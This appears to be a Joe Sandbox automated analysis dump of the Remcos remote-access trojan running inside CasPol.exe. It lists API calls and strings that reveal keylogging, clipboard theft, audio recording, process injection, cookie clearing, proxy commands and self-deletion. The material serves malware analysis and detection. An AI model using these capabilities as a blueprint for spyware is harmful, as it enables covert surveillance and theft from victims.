                            • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED6
                            • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                            • String ID:
                            • API String ID: 3658366068-0
                            APIs
                              • Part of subcall function 004558A9: CreateFileW.KERNEL32(00000000,00000000,?,00455C84,?,?,00000000,?,00455C84,00000000,0000000C), ref: 004558C6
                            • GetLastError.KERNEL32 ref: 00455CEF
                            • __dosmaperr.LIBCMT ref: 00455CF6
                            • GetFileType.KERNEL32(00000000), ref: 00455D02
                            • GetLastError.KERNEL32 ref: 00455D0C
                            • __dosmaperr.LIBCMT ref: 00455D15
                            • CloseHandle.KERNEL32(00000000), ref: 00455D35
                            • CloseHandle.KERNEL32(?), ref: 00455E7F
                            • GetLastError.KERNEL32 ref: 00455EB1
                            • __dosmaperr.LIBCMT ref: 00455EB8
                            Strings
                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                            • String ID: H
                            • API String ID: 4237864984-2852464175
                            APIs
                            • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453E2F
                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453EB2
                            • __alloca_probe_16.LIBCMT ref: 00453EEA
                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,00000001,00000000,\@E,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F45
                            • __alloca_probe_16.LIBCMT ref: 00453F94
                            • MultiByteToWideChar.KERNEL32(00000001,00000009,00000001,00000000,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F5C
                              • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                            • MultiByteToWideChar.KERNEL32(00000001,00000001,00000001,00000000,00000000,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FD8
                            • __freea.LIBCMT ref: 00454003
                            • __freea.LIBCMT ref: 0045400F
                            Strings
                            • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                            • String ID: \@E
                            • API String ID: 201697637-1814623452
                            APIs
                            Strings
                            • API ID: _free
                            • String ID: \&G$\&G$`&G
                            • API String ID: 269201875-253610517
                            Strings
                            • API ID:
                            • String ID: 65535$udp
                            • API String ID: 0-1267037602
                            APIs
                            • __Init_thread_footer.LIBCMT ref: 0040AD38
                            • Sleep.KERNEL32(000001F4), ref: 0040AD43
                            • GetForegroundWindow.USER32 ref: 0040AD49
                            • GetWindowTextLengthW.USER32(00000000), ref: 0040AD52
                            • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040AD86
                            • Sleep.KERNEL32(000003E8), ref: 0040AE54
                              • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                            Strings
                            • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                            • String ID: [${ User has been idle for $ minutes }$]
                            • API String ID: 911427763-3954389425
                            APIs
                            • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A892
                            • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A89F
                            • __dosmaperr.LIBCMT ref: 0043A8A6
                            • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8D2
                            • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8DC
                            • __dosmaperr.LIBCMT ref: 0043A8E3
                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A926
                            • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A930
                            • __dosmaperr.LIBCMT ref: 0043A937
                            • _free.LIBCMT ref: 0043A943
                            • _free.LIBCMT ref: 0043A94A
                            • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                            • String ID:
                            • API String ID: 2441525078-0
                            APIs
                            • SetEvent.KERNEL32(?,?), ref: 004054BF
                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                            • TranslateMessage.USER32(?), ref: 0040557E
                            • DispatchMessageA.USER32(?), ref: 00405589
                            • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                            • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                              • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                            Strings
                            • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                            • String ID: CloseChat$DisplayMessage$GetMessage
                            • API String ID: 2956720200-749203953
                            APIs
                              • Part of subcall function 00417F2C: __EH_prolog.LIBCMT ref: 00417F31
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660A4), ref: 00417DDC
                            • CloseHandle.KERNEL32(00000000), ref: 00417DE5
                            • DeleteFileA.KERNEL32(00000000), ref: 00417DF4
                            • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DA8
                              • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                            Strings
                            • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                            • String ID: 0VG$0VG$<$@$Temp
                            • API String ID: 1704390241-2575729100
                            APIs
                            • OpenClipboard.USER32 ref: 00416941
                            • EmptyClipboard.USER32 ref: 0041694F
                            • CloseClipboard.USER32 ref: 00416955
                            • OpenClipboard.USER32 ref: 0041695C
                            • GetClipboardData.USER32(0000000D), ref: 0041696C
                            • GlobalLock.KERNEL32(00000000), ref: 00416975
                            • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                            • CloseClipboard.USER32 ref: 00416984
                              • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                            Strings
                            • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                            • String ID: !D@
                            • API String ID: 2172192267-604454484
                            APIs
                            • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413417
                            • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413425
                            • GetFileSize.KERNEL32(?,00000000), ref: 00413432
                            • UnmapViewOfFile.KERNEL32(00000000), ref: 00413452
                            • CloseHandle.KERNEL32(00000000), ref: 0041345F
                            • CloseHandle.KERNEL32(?), ref: 00413465
                            • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                            • String ID:
                            • API String ID: 297527592-0
                            APIs
                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB1C
                            • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB33
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB40
                            • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB4F
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB60
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB63
                            Similarity
                            • API ID: Service$CloseHandle$Open$ControlManager
                            APIs
                            • _free.LIBCMT ref: 00448135
                              • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                              • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                            • _free.LIBCMT ref: 00448141
                            • _free.LIBCMT ref: 0044814C
                            • _free.LIBCMT ref: 00448157
                            • _free.LIBCMT ref: 00448162
                            • _free.LIBCMT ref: 0044816D
                            • _free.LIBCMT ref: 00448178
                            • _free.LIBCMT ref: 00448183
                            • _free.LIBCMT ref: 0044818E
                            • _free.LIBCMT ref: 0044819C
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            Similarity
                            • API ID: Eventinet_ntoa
                            • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                            APIs
                            • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00456FFF), ref: 00455F27
                            Similarity
                            • API ID: DecodePointer
                            • String ID: acos$asin$exp$log$log10$pow$sqrt
                            APIs
                            • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5
                              • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                            • Sleep.KERNEL32(00000064), ref: 00417521
                            • DeleteFileW.KERNEL32(00000000), ref: 00417555
                            Similarity
                            • API ID: File$CreateDeleteExecuteShellSleep
                            • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                            APIs
                            • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 004073DD
                            • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe), ref: 0040749E
                            Similarity
                            • API ID: CurrentProcess
                            • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                            APIs
                            • _strftime.LIBCMT ref: 00401D50
                              • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                            • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
                            • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                            • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                            Similarity
                            • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                            • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                            APIs
                            • std::_Lockit::_Lockit.LIBCPMT ref: 00410E6E
                            • int.LIBCPMT ref: 00410E81
                              • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                              • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                            • std::_Facet_Register.LIBCPMT ref: 00410EC1
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00410ECA
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00410EE8
                            • __Init_thread_footer.LIBCMT ref: 00410F29
                            Similarity
                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                            • String ID: ,kG$0kG
                            APIs
                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                            • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
                            • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                            • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                            • waveInStart.WINMM ref: 00401CFE
                            Similarity
                            • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                            • String ID: dMG$|MG$PG
                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D476
                              • Part of subcall function 0041D50F: RegisterClassExA.USER32(00000030), ref: 0041D55B
                              • Part of subcall function 0041D50F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                              • Part of subcall function 0041D50F: GetLastError.KERNEL32 ref: 0041D580
                            • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D4AD
                            • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D4C7
                            • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D4DD
                            • TranslateMessage.USER32(?), ref: 0041D4E9
                            • DispatchMessageA.USER32(?), ref: 0041D4F3
                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D500
                            Similarity
                            • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                            • String ID: Remcos
                            APIs
                              • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                              • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                              • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                              • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                            • _memcmp.LIBVCRUNTIME ref: 00445423
                            • _free.LIBCMT ref: 00445494
                            • _free.LIBCMT ref: 004454AD
                            • _free.LIBCMT ref: 004454DF
                            • _free.LIBCMT ref: 004454E8
                            • _free.LIBCMT ref: 004454F4
                            Similarity
                            • API ID: _free$ErrorLast$_abort_memcmp
                            • String ID: C
                            Similarity
                            • String ID: tcp$udp
                            APIs
                            • __Init_thread_footer.LIBCMT ref: 004018BE
                            • ExitThread.KERNEL32 ref: 004018F6
                            • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
                              • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                            Similarity
                            • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                            • String ID: PkG$XMG$NG$NG
                            APIs
                            • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FA4,?,00000000,00407FFC,00000000), ref: 004079C5
                            • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A0D
                              • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                            • CloseHandle.KERNEL32(00000000,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A4D
                            • MoveFileW.KERNEL32(00000000,00000000), ref: 00407A6A
                            • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407A95
                            • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5
                              • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                              • Part of subcall function 00404B96: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                            Similarity
                            • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                            • String ID: .part
                            APIs
                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044ACA3
                            • __alloca_probe_16.LIBCMT ref: 0044ACDB
                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044AD29
                            • __alloca_probe_16.LIBCMT ref: 0044ADC0
                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AE23
                            • __freea.LIBCMT ref: 0044AE30
                              • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                            • __freea.LIBCMT ref: 0044AE39
                            • __freea.LIBCMT ref: 0044AE5E
                            Similarity
                            • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                            APIs
                            • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004199CC
                            • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004199ED
                            • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A0D
                            • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A21
                            • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A37
                            • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A54
                            • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A6F
                            • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00419A8B
                            Similarity
                            • API ID: InputSend
                            Similarity
                            • API ID: __freea$__alloca_probe_16_free
                            • String ID: a/p$am/pm$zD
                            APIs
                            • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                            • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413B8B
                            Similarity
                            • API ID: Enum$InfoQueryValue
                            • String ID: [regsplt]$xUG$TG
                            APIs
                            • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044BB31,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B3FE
                            • __fassign.LIBCMT ref: 0044B479
                            • __fassign.LIBCMT ref: 0044B494
                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B4BA
                            • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BB31,00000000,?,?,?,?,?,?,?,?,?,0044BB31,?), ref: 0044B4D9
                            • WriteFile.KERNEL32(?,?,00000001,0044BB31,00000000,?,?,?,?,?,?,?,?,?,0044BB31,?), ref: 0044B512
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                            • String ID:
                            • API String ID: 1324828854-0
                            • Opcode ID: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                            • Instruction ID: 24f44d390d373c30b0d8a34eda065edd0bccebe0da4884afe324d1cece3cc5ea
                            • Opcode Fuzzy Hash: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                            • Instruction Fuzzy Hash: 0751D270900208AFDB10CFA8D885AEEFBF4EF09305F14856BE955E7292D734D941CBA9
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free
                            • String ID: D[E$D[E
                            • API String ID: 269201875-3695742444
                            • Opcode ID: bc4a191701c62eeb9847f09c94d148ade9b95fc5d58c951cd89fb7ba37de2388
                            • Instruction ID: e1ec1e089ae9cf4c30c2343e7c59e1c9a5dba52e91c7d03f0b1416238821c5a9
                            • Opcode Fuzzy Hash: bc4a191701c62eeb9847f09c94d148ade9b95fc5d58c951cd89fb7ba37de2388
                            • Instruction Fuzzy Hash: 7A415B31A001046BEB216BBA8C4566F3BB4EF41336F96061BFC24D7293DA7C880D566D
                            APIs
                            • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D46
                              • Part of subcall function 00413A55: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                              • Part of subcall function 00413A55: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                              • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                            • RegCloseKey.ADVAPI32(00000000,004660A4,004660A4,00466468,00466468,00000071), ref: 00413EB4
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseEnumInfoOpenQuerysend
                            • String ID: xUG$NG$NG$TG
                            • API String ID: 3114080316-2811732169
                            • Opcode ID: 08b76a7912a30081b3e44aa767579625ce380fd121976155e2fb2c8398a0c7a5
                            • Instruction ID: 865164b8d80166fcad8b4517e5ed4c9fbafb7c73de3830c3e78154838722fbed
                            • Opcode Fuzzy Hash: 08b76a7912a30081b3e44aa767579625ce380fd121976155e2fb2c8398a0c7a5
                            • Instruction Fuzzy Hash: 0B419E316082405BC324F726DC56AEF72959FD1348F40883FF54A671D2EF7C5949866E
                            APIs
                              • Part of subcall function 0041361B: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 0041363D
                              • Part of subcall function 0041361B: RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
                              • Part of subcall function 0041361B: RegCloseKey.ADVAPI32(?), ref: 00413665
                              • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                            • _wcslen.LIBCMT ref: 0041B763
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                            • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                            • API String ID: 37874593-122982132
                            • Opcode ID: 72adfb785b3f574a19d60f3d41fc94025ad2806abf0e3203f42f61a897081afc
                            • Instruction ID: 0af867b59be632d30c611c6dccf556baefac66a2e67262e696d3f692bc65d575
                            • Opcode Fuzzy Hash: 72adfb785b3f574a19d60f3d41fc94025ad2806abf0e3203f42f61a897081afc
                            • Instruction Fuzzy Hash: 6721A472A002086BDB14BAB58CD6AFE766D9B85328F14043FF405B72C2EE7C9D494269
                            APIs
                              • Part of subcall function 004135A6: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 004135CA
                              • Part of subcall function 004135A6: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 004135E7
                              • Part of subcall function 004135A6: RegCloseKey.KERNELBASE(?), ref: 004135F2
                            • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BF6B
                            • PathFileExistsA.SHLWAPI(?), ref: 0040BF78
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                            • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                            • API String ID: 1133728706-4073444585
                            • Opcode ID: c4bf94da8be876f49cea7471f0be2422906d591350fd81deebf31ce2b361b3bc
                            • Instruction ID: 11f9a5ab4d81baf10890d677fe2d2a0774849eb970c5828eb217b404dd8a17fe
                            • Opcode Fuzzy Hash: c4bf94da8be876f49cea7471f0be2422906d591350fd81deebf31ce2b361b3bc
                            • Instruction Fuzzy Hash: 38215271A4021AA6CB04F7B2CC569EE77699F10704F40017FE506B71D2EF7899498ADE
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 934edf86da25d837fa7b61c38a686264b457019a14f29bbb32a15566fa7518be
                            • Instruction ID: 6cb1fb7365923ae9cd4386fa22a0d7cc2d4bdc50975796c61f51bb0de8f74700
                            • Opcode Fuzzy Hash: 934edf86da25d837fa7b61c38a686264b457019a14f29bbb32a15566fa7518be
                            • Instruction Fuzzy Hash: B9110272504214BAEB216F728C0496F3AACEF85326B52422BFD11C7252DE38CC41CAA8
                            APIs
                            • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C430
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C44D
                            • CloseHandle.KERNEL32(00000000), ref: 0041C459
                            • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C46A
                            • CloseHandle.KERNEL32(00000000), ref: 0041C477
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseHandle$CreatePointerWrite
                            • String ID: hpF
                            • API String ID: 1852769593-151379673
                            • Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                            • Instruction ID: 5cb8be75c3dc4c1e2f747800af3fbfd5a98fa41e64789a84fd548ad7506a8702
                            • Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                            • Instruction Fuzzy Hash: B0110471288220FFEA104B24ACD9EFB739CEB46375F10462AF592C22C1C7259C81863A
                            APIs
                              • Part of subcall function 00450C41: _free.LIBCMT ref: 00450C6A
                            • _free.LIBCMT ref: 00450F48
                              • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                              • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                            • _free.LIBCMT ref: 00450F53
                            • _free.LIBCMT ref: 00450F5E
                            • _free.LIBCMT ref: 00450FB2
                            • _free.LIBCMT ref: 00450FBD
                            • _free.LIBCMT ref: 00450FC8
                            • _free.LIBCMT ref: 00450FD3
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                            • Instruction ID: d9348172fd0740f80504453a64c2ebf0df3e8af845a5f6206b1ac0666941ab15
                            • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                            • Instruction Fuzzy Hash: B411A231540B04AAD625BB72CC47FCB779CAF0230BF44491EBEED66053D6ACB9085745
                            APIs
                            • std::_Lockit::_Lockit.LIBCPMT ref: 00411170
                            • int.LIBCPMT ref: 00411183
                              • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                              • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                            • std::_Facet_Register.LIBCPMT ref: 004111C3
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004111CC
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004111EA
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                            • String ID: (mG
                            • API String ID: 2536120697-4059303827
                            • Opcode ID: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
                            • Instruction ID: 9d9da6683174d9a5c92fa95d325e3547e0845688fcbb555b93a4fb26f280994d
